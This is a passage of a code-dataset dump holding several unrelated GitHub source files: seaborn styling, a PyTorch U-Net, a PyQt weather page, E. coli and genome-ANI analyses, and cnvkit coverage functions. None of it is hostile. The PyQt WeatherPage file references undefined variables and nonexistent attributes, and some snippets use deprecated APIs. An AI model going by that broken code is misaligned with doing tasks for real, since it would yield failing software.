dataTips)\n#Quitar los ticks derecha con la función, se úede decir por parametros a que parte quitar lo que sería las lineas de referencia si es top, bottom, left, rigth\nsns.despine( left=False, bottom=True)\nplt.show()\n#Ahora se va a utilizar lo que sería set_context para ajusatr la grafica según lo necesitemos\nsns.set_context('poster', font_scale=3) #Puede ser ademas de poster, paper, notebook,talk, por otro lado, el font scale es agrandarle dos veces apartir de ese contexto \nsns.countplot(x='sex', data = dataTips)\nplt.show()\n\n# Darle estilos de color a la gráfica con palette\nsns.set_context('notebook') # Se ajusta de nuevo el contexto\nsns.lmplot(x='total_bill', y='tip', data=dataTips, hue='sex', palette='cividis') #cividis, coolwarm\nplt.show()\n# Estos palletes se puede ver diferentes colores o temas buscandos matplotlib colormap https://matplotlib.org/stable/tutorials/colors/colormaps.html\n","repo_name":"kennethLeonel/PythonExercises","sub_path":"Semana5/estilos.py","file_name":"estilos.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15003681619","text":"import torch\nimport numpy as np\n\nfrom torch import nn\n\n# U-Net\n\n# Two convolution block. Performs two consecutive convolutions\nclass TwoConv(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding='same'):\n super().__init__()\n\n self.module_list = nn.ModuleList([])\n \n #Using Henriks convultion layering or the one introduced in the Unet paper?\n self.module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding))\n self.module_list.append(nn.ReLU())\n\n self.module_list.append(nn.Conv2d(out_channels, out_channels, kernel_size, stride, padding))\n self.module_list.append(nn.ReLU())\n\n def forward(self, x):\n y = x\n for module in self.module_list:\n y = module(y)\n return y\n\n# UNet encoder block. 
Performs two convolutions and max pooling.\nclass ConvPool(TwoConv):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding='same'):\n super().__init__(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=padding)\n self.max = nn.MaxPool2d(2, 2)\n\n def forward(self, x):\n c = super().forward(x)\n p = self.max(c)\n return c, p\n\n# UNet decoder block. Performs upsampling, concatenation of the two inputs and two convolutions.\nclass UpConv(TwoConv):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding='same'):\n super().__init__(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=padding)\n # We may use different upsampling method here.\n self.upsampling = nn.ConvTranspose2d(in_channels, out_channels, kernel_size=2, stride=2)\n\n def forward(self, x, skip):\n u = self.upsampling(x)\n u = torch.cat([u, skip], 1)\n c = super().forward(u)\n return c, u\n\n\nclass UNet(nn.Module):\n def __init__(self, in_channels, min, max, num_classes):\n super().__init__()\n self.enc_layers = nn.ModuleList([])\n self.dec_layers = nn.ModuleList([])\n self.enc_final = None\n self.dec_final = None\n self.softmax = None\n\n # When go down the encoder/up the decoder the number of filter doubles/halves\n # respectively. For that we will generate the powers of two.\n # List of powers of 2 [min, 2*min, 4*min, ..., max]\n channels = []\n power = min\n for i in range(int(np.log2(max // min))):\n channels.append(power)\n power = power*2\n\n # Construct list of blocks for the encoder\n self.enc_layers.append(ConvPool(in_channels, min))\n for i in range(len(channels)-1):\n enc_layer = ConvPool(channels[i], channels[i+1])\n self.enc_layers.append(enc_layer)\n\n # Construct list of blocks for the encoder\n for i in range(len(channels)-1):\n dec_layer = UpConv(channels[i+1], channels[i])\n self.dec_layers.insert(0, dec_layer)\n self.dec_layers.insert(0, UpConv(max, channels[-1]))\n\n # Set up final convolutions for the encoder and decoder\n self.enc_final = TwoConv(channels[len(channels)-1], max, 3, 1, 'same')\n self.dec_final = nn.Conv2d(min, num_classes, 1, 1)\n self.softmax = nn.Softmax(0)\n\n def forward(self, x):\n # Collect the values for skip connections to the decoder\n skip_connections = []\n p = x\n # Encoder\n for layer in self.enc_layers:\n c, p = layer(p)\n skip_connections.append(c)\n\n # Bottleneck\n c = self.enc_final(p)\n\n # Decoder\n for layer in self.dec_layers:\n skip = skip_connections.pop()\n c, u = layer(c, skip) # if we do not need c we can use _ instead\n c = self.dec_final(c)\n\n return self.softmax(c)","repo_name":"LazyTurtleknight/deepl","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14375181865","text":"# -*- coding: utf-8 -*-\n\n# description:\n# author: xiaoland\n# create_time: 2018/8/6\n\n\"\"\"\n desc:pass\n\"\"\"\nimport os\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLineEdit, QLabel\nfrom PyQt4 import QtGui\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nsys.path.append('/home/pi/xiaolan/')\nfrom Base import xiaolanBase\n\nclass WeatherPage(QWidget, xiaolanBase):\n\n def __init__(self):\n\n super(WeatherPage, self).__init__()\n self.weather_page_display()\n\n def weather_page_display(self):\n\n \"\"\"\n 天气预报页面\n :return:\n \"\"\"\n weather = self.set_weather()\n self.set_weather_background_image(weather)\n 
self.set_remind_word()\n # 小蓝设置按钮\n setting_button = QPushButton(\"\", self)\n setting_button.move(904, 50)\n setting_button.pushButton.setStyleSheet(\n 'QPushButton{border-image:url(/home/pi/xiaolan/memory_center/display_image/setting.png)}')\n\n # 技能中心按钮\n setting_button = QPushButton(\"\", self)\n setting_button.move(824, 50)\n setting_button.pushButton.setStyleSheet(\n 'QPushButton{border-image:url(/home/pi/xiaolan/memory_center/display_image/skill_center.png)}')\n\n # 帮助中心按钮\n setting_button = QPushButton(\"\", self)\n setting_button.move(744, 50)\n setting_button.pushButton.setStyleSheet(\n 'QPushButton{border-image:url(/home/pi/xiaolan/memory_center/display_image/help_center.png)}')\n\n def set_remind_word(self):\n\n \"\"\"\n 设置提醒词\n :return:\n \"\"\"\n remind_word = QLabel(self)\n text = self.client_to_server('get_weather_remind_word', 0)\n remind_word.move(362, 540)\n remind_word.setText(text)\n remind_word.adjustSize()\n\n def set_weather(self):\n\n \"\"\"\n 设置天气预报\n :return:\n \"\"\"\n res = self.client_to_server('weather_page_get_weather', {'time': 'today'})\n weather_text = QLabel(self)\n remind_word.move(512, 300)\n remind_word.setText(res['WeatherText'])\n remind_word.adjustSize()\n return res['Weather']\n\n def set_weather_background_image(self, weather):\n\n \"\"\"\n 设置天气背景图片\n :param weather:天气类型\n :return:\n \"\"\"\n if weather == 'rainy':\n image_path = '/home/pi/xiaolan/memory_center/display_image/rainy.png'\n palette3 = QtGui.QPalette(self)\n palette3.setBrush(self.backgroundRole(), QtGui.QBrush(QtGui.QPixmap(image_path)))\n self.setPalette(palette3)\n elif weather == 'sunny':\n image_path = '/home/pi/xiaolan/memory_center/display_image/sunny.png'\n palette3 = QtGui.QPalette(self)\n palette3.setBrush(self.backgroundRole(), QtGui.QBrush(QtGui.QPixmap(image_path)))\n self.setPalette(palette3)\n elif weather == 'cloudy':\n image_path = '/home/pi/xiaolan/memory_center/display_image/cloudy.png'\n palette3 = QtGui.QPalette(self)\n palette3.setBrush(self.backgroundRole(), QtGui.QBrush(QtGui.QPixmap(image_path)))\n self.setPalette(palette3)\n else:\n image_path = '/home/pi/xiaolan/memory_center/display_image/white_cloud_bgi.png'\n palette3 = QtGui.QPalette(self)\n palette3.setBrush(self.backgroundRole(), QtGui.QBrush(QtGui.QPixmap(image_path)))\n self.setPalette(palette3)","repo_name":"andy2080/xiaolan","sub_path":"display_center/WeatherPageDisplay.py","file_name":"WeatherPageDisplay.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"32949911707","text":"import read_data as rd\nimport datetime as dt\nimport visualizations as viz\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats\n\n\ndef check_sample_times(df=None, to_plot=False):\n '''\n Investigates whether there is a relationship between the time a\n sample was taken and the E. coli reading. A possible hypothesis\n being that samples taken later in the day might tend to read be\n higher.\n\n The conclusions from this function seem to indicate that there\n is not a subtantial relationship between sample time and E.\n coli reading.\n\n Inputs\n ------\n df : Dataframe object, should contain at least the columns\n 'Client.ID', 'Escherichia.coli', 'Sample.Collection.Time',\n if df is None, then it will be read in from read_data.\n to_plot : Boolean, if true, the results will be printed and\n plotted. 
Otherwise, just the cleansed dataframe will\n be returned.\n\n Returns\n -------\n ct : Dataframe of collection times and E. coli readings.\n The column 'Sample.Collection.Time' is the fraction of the day,\n for example, a value of 0.50 indicates the collection happened\n at noon, a value of 0.25 would indicate 6:00 AM, etc.\n '''\n if df is None:\n df = rd.read_data()\n\n ct = df[['Client.ID', 'Escherichia.coli', 'Sample.Collection.Time']].dropna()\n\n def clean_times(s):\n '''\n Takes in a string from the sample collection column and\n makes it machine readable if possible, and a NaN otherwise\n '''\n if type(s) is not str:\n if type(s) is dt.datetime or type(s) is dt.time:\n return dt.datetime(2016, 1, 1, hour=s.hour, minute=s.minute)\n\n try:\n if ':' not in s:\n return float('nan')\n i = s.index(':')\n hr = int(s[max(i - 2, 0):i])\n mn = int(s[i+1:i+3])\n\n return dt.datetime(2016, 1, 1, hour=hr, minute=mn)\n except:\n return float('nan')\n\n ct['Sample.Collection.Time'] = ct['Sample.Collection.Time'].map(clean_times)\n ct = ct.dropna()\n ct['Sample.Collection.Time'] = ct['Sample.Collection.Time'].map(\n lambda x: x.hour / 24. + x.minute / (24. * 60.)\n )\n # Filter out those samples which came before 4:00 AM or after 8:00 PM\n # It seems like most of the ones that come from before 4:00 AM might\n # actually be occuring in the afternoon. I've tried taking these and manually\n # changing them to the afternoon and there was no significant change in results.\n ct = ct[(ct['Sample.Collection.Time'] > .125) & (ct['Sample.Collection.Time'] < .83)]\n\n if to_plot:\n # t-test\n ct_low = ct[ct['Escherichia.coli'] < 235]\n ct_high = ct[ct['Escherichia.coli'] >= 235]\n ttest = scipy.stats.ttest_ind(ct_low['Sample.Collection.Time'],\n ct_high['Sample.Collection.Time'])\n print('tests comparing below threshold to above threshold:')\n print('\\tOVERALL:')\n print('\\tt-statistic: {0}\\n\\tp-value : {1}'.format(ttest[0], ttest[1]))\n\n low_mean = ct_low['Sample.Collection.Time'].mean()\n low_mean_hr = int(low_mean * 24)\n low_mean_min = str(int((low_mean * 24 - low_mean_hr) * 60))\n if len(low_mean_min) < 2:\n low_mean_min = '0' + low_mean_min\n print('\\tbelow thresh mean: {0} ({1})'.format(\n low_mean, str(low_mean_hr) + ':' + low_mean_min\n ))\n high_mean = ct_high['Sample.Collection.Time'].mean()\n high_mean_hr = int(high_mean * 24)\n high_mean_min = str(int((high_mean * 24 - high_mean_hr) * 60))\n if len(high_mean_min) < 2:\n high_mean_min = '0' + high_mean_min\n print('\\tbelow thresh mean: {0} ({1})'.format(\n high_mean, str(high_mean_hr) + ':' + high_mean_min\n ))\n\n ttests = []\n for b in ct['Client.ID'].dropna().unique().tolist():\n xl = ct_low[ct_low['Client.ID'] == b]\n xh = ct_high[ct_high['Client.ID'] == b]\n ttests.append(scipy.stats.ttest_ind(xl['Sample.Collection.Time'],\n xh['Sample.Collection.Time']))\n ttest = ttests[-1]\n print('\\t' + b)\n print('\\t\\tt-statistic: {0}\\n\\t\\tp-value : {1}'.format(ttest[0], ttest[1]))\n plt.hist(map(lambda x: x[1], ttests))\n\n # qq-plot\n x = []\n y = []\n for p in np.linspace(0,1,1000):\n x.append(ct_low['Sample.Collection.Time'].quantile(p))\n y.append(ct_high['Sample.Collection.Time'].quantile(p))\n ax = plt.subplots(1)[1]\n ax.plot([0, 1], [0, 1], 'r--')\n ax.hold(True)\n ax.plot(x, y)\n ax.set_xlabel('Below Threshold Quantiles')\n ax.set_ylabel('Above Threshold Quantiles')\n ax.set_aspect('equal')\n\n # set e coli to log scale\n ct['Escherichia.coli'] = ct['Escherichia.coli'].map(lambda x: np.log(x + 1.))\n\n # correlations\n 
print('Correlations between log(E. coli) and Sample collection time:')\n print('\\tPearson correlation : ' + str(ct.corr(method='pearson').ix[0,1]))\n print('\\tSpearman correlation: ' + str(ct.corr(method='spearman').ix[0,1]))\n\n # scatter plot\n ct.plot(y='Escherichia.coli', x='Sample.Collection.Time', style='.')\n ax = plt.gca()\n ax.set_xlim([ct['Sample.Collection.Time'].min(), ct['Sample.Collection.Time'].max()])\n\n # histograms\n tb = viz.TO_BLOCK\n viz.TO_BLOCK = False\n fig, ax = viz.plot_beach(columns='Sample.Collection.Time', df=ct)\n viz.TO_BLOCK = tb\n ax.legend_.remove()\n plt.show(tb)\n ct['Escherichia.coli'] = ct['Escherichia.coli'].map(lambda x: np.exp(x) - 1.)\n\n return ct\n\n\nif __name__ == '__main__':\n check_sample_times(to_plot=True)\n","repo_name":"meineke/bootcamp-messy-data","sub_path":"python_src/data_investigations.py","file_name":"data_investigations.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"13993401097","text":"import argparse\n\n\ndef extract_pinyin_lables(source, target):\n \"\"\"Extract pinyin labels from Baker's prosody labeling.\"\"\"\n with open(source, 'rt', encoding='utf-8') as fin:\n with open(target, 'wt', encoding='utf-8') as fout:\n for i, line in enumerate(fin):\n if i % 2 == 0:\n sentence_id, raw_text = line.strip().split()\n fout.write(f'{sentence_id} ')\n else:\n transcription = line.strip()\n fout.write(f'{transcription}\\n')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"extract baker pinyin labels\")\n parser.add_argument(\n \"input\", type=str, help=\"source file of baker's prosody label file\")\n parser.add_argument(\n \"output\", type=str, help=\"target file to write pinyin lables\")\n args = parser.parse_args()\n extract_pinyin_lables(args.input, args.output)\n","repo_name":"muweilin/DeepSpeech","sub_path":"examples/chinese_g2p/local/extract_pinyin_label.py","file_name":"extract_pinyin_label.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"2170060235","text":"\"\"\"Supporting functions for the 'antitarget' command.\"\"\"\nimport logging\nimport math\nimport os.path\nimport time\nfrom concurrent import futures\nfrom io import StringIO\n\nimport numpy as np\nimport pandas as pd\nimport pysam\nfrom skgenome import tabio\n\nfrom . 
import core, samutil\nfrom .cnary import CopyNumArray as CNA\nfrom .parallel import rm, to_chunks\nfrom .params import NULL_LOG2_COVERAGE\n\n\ndef do_coverage(\n bed_fname, bam_fname, by_count=False, min_mapq=0, processes=1, fasta=None\n):\n \"\"\"Calculate coverage in the given regions from BAM read depths.\"\"\"\n if not samutil.ensure_bam_sorted(bam_fname, fasta=fasta):\n raise RuntimeError(f\"BAM file {bam_fname} must be sorted by coordinates\")\n samutil.ensure_bam_index(bam_fname)\n # ENH: count importers.TOO_MANY_NO_COVERAGE & warn\n cnarr = interval_coverages(\n bed_fname, bam_fname, by_count, min_mapq, processes, fasta\n )\n return cnarr\n\n\ndef interval_coverages(bed_fname, bam_fname, by_count, min_mapq, processes, fasta=None):\n \"\"\"Calculate log2 coverages in the BAM file at each interval.\"\"\"\n meta = {\"sample_id\": core.fbase(bam_fname)}\n start_time = time.time()\n\n # Skip processing if the BED file is empty\n with open(bed_fname) as bed_handle:\n for line in bed_handle:\n if line.strip():\n break\n else:\n logging.info(\n \"Skip processing %s with empty regions file %s\",\n os.path.basename(bam_fname),\n bed_fname,\n )\n return CNA.from_rows([], meta_dict=meta)\n\n # Calculate average read depth in each bin\n if by_count:\n results = interval_coverages_count(\n bed_fname, bam_fname, min_mapq, processes, fasta\n )\n read_counts, cna_rows = zip(*results)\n read_counts = pd.Series(read_counts)\n cnarr = CNA.from_rows(\n list(cna_rows), columns=CNA._required_columns + (\"depth\",), meta_dict=meta\n )\n else:\n table = interval_coverages_pileup(\n bed_fname, bam_fname, min_mapq, processes, fasta\n )\n read_len = samutil.get_read_length(bam_fname, fasta=fasta)\n read_counts = table[\"basecount\"] / read_len\n table = table.drop(\"basecount\", axis=1)\n cnarr = CNA(table, meta)\n\n # Log some stats\n tot_time = time.time() - start_time\n tot_reads = read_counts.sum()\n logging.info(\n \"Time: %.3f seconds (%d reads/sec, %s bins/sec)\",\n tot_time,\n int(round(tot_reads / tot_time, 0)),\n int(round(len(read_counts) / tot_time, 0)),\n )\n logging.info(\n \"Summary: #bins=%d, #reads=%d, mean=%.4f, min=%s, max=%s\",\n len(read_counts),\n tot_reads,\n (tot_reads / len(read_counts)),\n read_counts.min(),\n read_counts.max(),\n )\n tot_mapped_reads = samutil.bam_total_reads(bam_fname, fasta=fasta)\n if tot_mapped_reads:\n logging.info(\n \"Percent reads in regions: %.3f (of %d mapped)\",\n 100.0 * tot_reads / tot_mapped_reads,\n tot_mapped_reads,\n )\n else:\n logging.info(\"(Couldn't calculate total number of mapped reads)\")\n\n return cnarr\n\n\ndef interval_coverages_count(bed_fname, bam_fname, min_mapq, procs=1, fasta=None):\n \"\"\"Calculate log2 coverages in the BAM file at each interval.\"\"\"\n regions = tabio.read_auto(bed_fname)\n if procs == 1:\n bamfile = pysam.AlignmentFile(bam_fname, \"rb\", reference_filename=fasta)\n for chrom, subregions in regions.by_chromosome():\n logging.info(\n \"Processing chromosome %s of %s\", chrom, os.path.basename(bam_fname)\n )\n for count, row in _rdc_chunk(bamfile, subregions, min_mapq):\n yield [count, row]\n else:\n with futures.ProcessPoolExecutor(procs) as pool:\n args_iter = (\n (bam_fname, subr, min_mapq, fasta)\n for _c, subr in regions.by_chromosome()\n )\n for chunk in pool.map(_rdc, args_iter):\n for count, row in chunk:\n yield [count, row]\n\n\ndef _rdc(args):\n \"\"\"Wrapper for parallel.\"\"\"\n return list(_rdc_chunk(*args))\n\n\ndef _rdc_chunk(bamfile, regions, min_mapq, fasta=None):\n if isinstance(bamfile, str):\n 
bamfile = pysam.AlignmentFile(bamfile, \"rb\", reference_filename=fasta)\n for chrom, start, end, gene in regions.coords([\"gene\"]):\n yield region_depth_count(bamfile, chrom, start, end, gene, min_mapq)\n\n\ndef region_depth_count(bamfile, chrom, start, end, gene, min_mapq):\n \"\"\"Calculate depth of a region via pysam count.\n\n i.e. counting the number of read starts in a region, then scaling for read\n length and region width to estimate depth.\n\n Coordinates are 0-based, per pysam.\n \"\"\"\n\n def filter_read(read):\n \"\"\"True if the given read should be counted towards coverage.\"\"\"\n return not (\n read.is_duplicate\n or read.is_secondary\n or read.is_unmapped\n or read.is_qcfail\n or read.mapq < min_mapq\n )\n\n count = 0\n bases = 0\n for read in bamfile.fetch(reference=chrom, start=start, end=end):\n if filter_read(read):\n count += 1\n # Only count the bases aligned to the region\n bases += sum(1 for p in read.positions if start <= p < end)\n depth = bases / (end - start) if end > start else 0\n row = (\n chrom,\n start,\n end,\n gene,\n math.log(depth, 2) if depth else NULL_LOG2_COVERAGE,\n depth,\n )\n return count, row\n\n\ndef interval_coverages_pileup(bed_fname, bam_fname, min_mapq, procs=1, fasta=None):\n \"\"\"Calculate log2 coverages in the BAM file at each interval.\"\"\"\n logging.info(\"Processing reads in %s\", os.path.basename(bam_fname))\n if procs == 1:\n table = bedcov(bed_fname, bam_fname, min_mapq, fasta)\n else:\n chunks = []\n with futures.ProcessPoolExecutor(procs) as pool:\n args_iter = (\n (bed_chunk, bam_fname, min_mapq, fasta)\n for bed_chunk in to_chunks(bed_fname)\n )\n for bed_chunk_fname, table in pool.map(_bedcov, args_iter):\n chunks.append(table)\n rm(bed_chunk_fname)\n table = pd.concat(chunks, ignore_index=True)\n # Fill in CNA required columns\n if \"gene\" in table:\n table[\"gene\"] = table[\"gene\"].fillna(\"-\")\n else:\n table[\"gene\"] = \"-\"\n # User-supplied bins might be zero-width or reversed -- skip those\n spans = table.end - table.start\n ok_idx = spans > 0\n table = table.assign(depth=0, log2=NULL_LOG2_COVERAGE)\n table.loc[ok_idx, \"depth\"] = table.loc[ok_idx, \"basecount\"] / spans[ok_idx]\n ok_idx = table[\"depth\"] > 0\n table.loc[ok_idx, \"log2\"] = np.log2(table.loc[ok_idx, \"depth\"])\n return table\n\n\ndef _bedcov(args):\n \"\"\"Wrapper for parallel.\"\"\"\n bed_fname = args[0]\n table = bedcov(*args)\n return bed_fname, table\n\n\ndef bedcov(bed_fname, bam_fname, min_mapq, fasta=None):\n \"\"\"Calculate depth of all regions in a BED file via samtools (pysam) bedcov.\n\n i.e. mean pileup depth across each region.\n \"\"\"\n # Count bases in each region; exclude low-MAPQ reads\n cmd = [bed_fname, bam_fname]\n if min_mapq and min_mapq > 0:\n cmd.extend([\"-Q\", bytes(min_mapq)])\n if fasta:\n cmd.extend([\"--reference\", fasta])\n try:\n raw = pysam.bedcov(*cmd, split_lines=False)\n except pysam.SamtoolsError as exc:\n raise ValueError(\n f\"Failed processing {bam_fname!r} coverages in {bed_fname!r} regions. 
\"\n f\"PySAM error: {exc}\"\n ) from exc\n if not raw:\n raise ValueError(\n f\"BED file {bed_fname!r} chromosome names don't match any in \"\n f\"BAM file {bam_fname!r}\"\n )\n columns = detect_bedcov_columns(raw)\n table = pd.read_csv(StringIO(raw), sep=\"\\t\", names=columns, usecols=columns)\n return table\n\n\ndef detect_bedcov_columns(text):\n \"\"\"Determine which 'bedcov' output columns to keep.\n\n Format is the input BED plus a final appended column with the count of\n basepairs mapped within each row's region. The input BED might have 3\n columns (regions without names), 4 (named regions), or more (arbitrary\n columns after 'gene').\n \"\"\"\n firstline = text[: text.index(\"\\n\")]\n tabcount = firstline.count(\"\\t\")\n if tabcount < 3:\n raise RuntimeError(f\"Bad line from bedcov:\\n{firstline!r}\")\n if tabcount == 3:\n return [\"chromosome\", \"start\", \"end\", \"basecount\"]\n if tabcount == 4:\n return [\"chromosome\", \"start\", \"end\", \"gene\", \"basecount\"]\n # Input BED has arbitrary columns after 'gene' -- ignore them\n fillers = [f\"_{i}\" for i in range(1, tabcount - 3)]\n return [\"chromosome\", \"start\", \"end\", \"gene\"] + fillers + [\"basecount\"]\n","repo_name":"etal/cnvkit","sub_path":"cnvlib/coverage.py","file_name":"coverage.py","file_ext":"py","file_size_in_byte":8897,"program_lang":"python","lang":"en","doc_type":"code","stars":434,"dataset":"github-code","pt":"81"} +{"seq_id":"31080213671","text":"import argparse, sys, random\nfrom collections import defaultdict\nimport matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np, pandas as pd; np.random.seed(0)\nimport seaborn as sns; sns.set(style=\"white\", color_codes=True)\nfrom scipy.stats import pearsonr as corr\nfrom pygam import LinearGAM\n\n\n\"\"\"\n# Set the default sans-serif font to Helvetica\nmatplotlib.rcParams['font.sans-serif'] = \"Helvetica\"\n# Set default font to sans-serif\nmatplotlib.rcParams['font.family'] = \"sans-serif\"\n\"\"\"\n\nclass TickRedrawer(matplotlib.artist.Artist):\n #https://stackoverflow.com/questions/19677963/\n #matplotlib-keep-grid-lines-behind-the-graph-but-the-y-and-x-axis-above\n \"\"\"Artist to redraw ticks.\"\"\"\n\n __name__ = \"ticks\"\n\n zorder = 10\n\n @matplotlib.artist.allow_rasterization\n def draw(self, renderer: matplotlib.backend_bases.RendererBase) -> None:\n \"\"\"Draw the ticks.\"\"\"\n if not self.get_visible():\n self.stale = False\n return\n\n renderer.open_group(self.__name__, gid=self.get_gid())\n\n for axis in (self.axes.xaxis, self.axes.yaxis):\n loc_min, loc_max = axis.get_view_interval()\n\n for tick in axis.get_major_ticks() + axis.get_minor_ticks():\n if tick.get_visible() and loc_min <= tick.get_loc() <= loc_max:\n for artist in (tick.tick1line, tick.tick2line):\n artist.draw(renderer)\n\n renderer.close_group(self.__name__)\n self.stale = False\n\n\ndef subsample_gpairs(gpairs, npairs, r, xmin, xmax):\n \"\"\" subsample with replacement, r gpairs between [xmin, xmax] ANI \"\"\"\n X = []\n\n while len(X) < r:\n z = random.sample(npairs, 1)[0]\n ani = gpairs[z][1]\n if ani >= xmin and ani <= xmax: X.append(z)\n\n return X\n\ndef gather_subsampled_data(ani_file, xmin, xmax, r, e):\n \"\"\"Reads in the tsv ALLvsAll ANI \"\"\"\n\n print(\"\\nReading data.\")\n name_dict = defaultdict(dict)\n data_dict = {'gpair': [], 'species': [], 'xs': [], 'ys': []}\n\n with open(ani_file, 'r') as f:\n for l in f:\n # split each line by tabs\n X = l.rstrip().split('\\t')\n # get the genome pair names\n qry_genome = 
X[0]\n ref_genome = X[1]\n species = qry_genome.split('/')[1]\n # total frac column. Keep larger genome as reference\n tfrac = int(X[4])\n # remove self matchs\n if qry_genome == ref_genome: continue\n # compute metrics\n ani = float(X[2])\n # get the shared genome fraction\n shared = float(X[3])\n total = float(X[4])\n ratio = shared / total\n # sort genome file names and combine\n names = [qry_genome, ref_genome]\n names.sort()\n gname = '-'.join(names)\n # record values from only one genome pair.\n # Keep larger genome as reference.\n if tfrac > name_dict[species].get(gname[0], 0):\n # add genome pair to dict\n name_dict[species][gname] = [tfrac, ani, ratio]\n\n for i in range(e):\n # subsample r genome pairs per species and write data to arrays\n for species, gpairs in name_dict.items():\n npairs = list(gpairs.keys())\n vals = gpairs.values()\n # Check for enough genome pairs in ANI range for the species\n # 10 genomes minimum = 45 combinations of genome pairs minimum\n # i[1] = ani\n testani = [i[1] for i in vals if i[1] >= xmin and i[1] <= xmax]\n if len(testani) < 45:\n #X = npairs\n continue\n else:\n X = subsample_gpairs(gpairs, npairs, r, xmin, xmax)\n \n for g in X:\n ani = gpairs[g][1]\n ratio = gpairs[g][2]\n data_dict['gpair'].append(g)\n data_dict['species'].append(species)\n data_dict['xs'].append(ani)\n data_dict['ys'].append(ratio)\n\n\n # convert to dataframe\n df = pd.DataFrame(data_dict)\n df = df[df['xs'] <= xmax] \n df = df[df['xs'] >= xmin]\n n = len(df)\n\n # compute and print out some things\n total_species = set(data_dict['species'])\n filtered_species = set(df['species'].unique())\n diff_species = total_species - filtered_species\n print(f'\\nTotal species in file: {len(total_species)}')\n print(f'Species between {xmin}-{xmax}% ANI: {len(filtered_species)}')\n print(f'Species not included: {diff_species}')\n\n total_genomes = count_genomes(df)\n ratios = get_ratios(df)\n\n print(f'\\n\\nGenome pairs between {xmin}-{xmax}% ANI: {total_genomes}')\n print(f'Genome pair ratio 100%/remaining: {ratios[0]}')\n print(f'Genome pair ratio >99.5%/remaining: {ratios[1]}')\n print(f'Genome pair ratio >99%/remaining: {ratios[2]}')\n\n return df, n\n\n\ndef count_genomes(df):\n\n # use a dict to track unique genome names\n # duplicate keys are automatically replaced\n genome_count = {}\n # get the list of genome pairs\n genome_pair_list = df['gpair'].to_list()\n # read through the list, cut out genome names and store\n for gpair in genome_pair_list:\n X = gpair.split('-')\n g1 = X[0]\n g2 = X[1]\n genome_count[g1] = ''\n genome_count[g2] = ''\n\n total_genomes = len(genome_count)\n\n return total_genomes\n\n\ndef get_ratios(df):\n\n x = df['xs']\n\n x100 = len([i for i in x if i == 100])\n d100 = len([i for i in x if i < 100])\n x995 = len([i for i in x if i >= 99.5])\n d995 = len([i for i in x if i < 99.5])\n x99 = len([i for i in x if i >= 99])\n d99 = len([i for i in x if i < 99])\n\n ratios = [x100/d100, x995/d995, x99/d99]\n\n return ratios\n\n\ndef gather_data(ani_file, xmin, xmax):\n \"\"\"Reads in the tsv ALLvsAll ANI \"\"\"\n\n print(\"\\nReading data.\")\n name_dict = {}\n data_dict = {'gpair': [],'species': [], 'xs': [], 'ys': []}\n\n with open(ani_file, 'r') as f:\n for l in f:\n # split each line by tabs\n X = l.rstrip().split('\\t')\n # get the genome pair names\n qry_genome = X[0]\n ref_genome = X[1]\n species = qry_genome.split('/')[1]\n # total frac column. 
Keep larger genome as reference\n tfrac = int(X[4]) \n # remove self matchs\n if qry_genome == ref_genome: continue\n # compute metrics\n ani = float(X[2])\n # get the shared genome fraction\n shared = float(X[3])\n total = float(X[4])\n ratio = shared / total\n # sort genome file names and combine\n names = [qry_genome, ref_genome]\n names.sort()\n gname = '-'.join(names)\n # record values from only one genome pair.\n # Keep larger genome as reference.\n if tfrac > name_dict.get(gname[0], 0):\n # add genome pair to dict\n name_dict[gname] = [tfrac, ani, ratio, species]\n\n # write data to arrays\n for gpair, metrics in name_dict.items():\n ani = metrics[1]\n ratio = metrics[2]\n species = metrics[3]\n data_dict['xs'].append(ani)\n data_dict['ys'].append(ratio)\n data_dict['species'].append(species)\n data_dict['gpair'].append(gpair)\n # convert to dataframe\n df = pd.DataFrame(data_dict)\n df = df[df['xs'] <= xmax] \n df = df[df['xs'] >= xmin]\n n = len(df)\n\n # compute and print out some things\n total_species = set(data_dict['species'])\n filtered_species = set(df['species'].unique())\n diff_species = total_species - filtered_species\n print(f'\\nTotal species in file: {len(total_species)}')\n print(f'Species between {xmin}-{xmax}% ANI: {len(filtered_species)}')\n print(f'Species not included: {diff_species}')\n\n total_genomes = count_genomes(df)\n ratios = get_ratios(df)\n\n print(f'\\n\\nGenome pairs between {xmin}-{xmax}% ANI: {total_genomes}')\n print(f'Genome pair ratio 100%/remaining: {ratios[0]}')\n print(f'Genome pair ratio >99.5%/remaining: {ratios[1]}')\n print(f'Genome pair ratio >99%/remaining: {ratios[2]}')\n\n return df, n\n\n\ndef gather_stats(df):\n \"\"\"Computes correlation, mean, and median on df columns xs and ys \"\"\"\n\n # Compute Pearson Correlation Coefficient\n print(\"\\nCalculating statistics.\")\n pcorr = corr(df['xs'], df['ys'])\n\n # Compute ANI mean and median\n ani_mean = np.mean(df['xs'])\n ani_median = np.median(df['xs'])\n frag_mean = np.mean(df['ys'])\n frag_median = np.median(df['ys'])\n\n # Compile dictionairy\n df_stats = {\n 'pcorr': pcorr,\n 'ani_mean': ani_mean,\n 'ani_median': ani_median,\n 'frag_mean': frag_mean,\n 'frag_median': frag_median\n }\n\n print(f\"\\nANI mean: {ani_mean:.2f}\\nANI median: {ani_median:.2f}\")\n 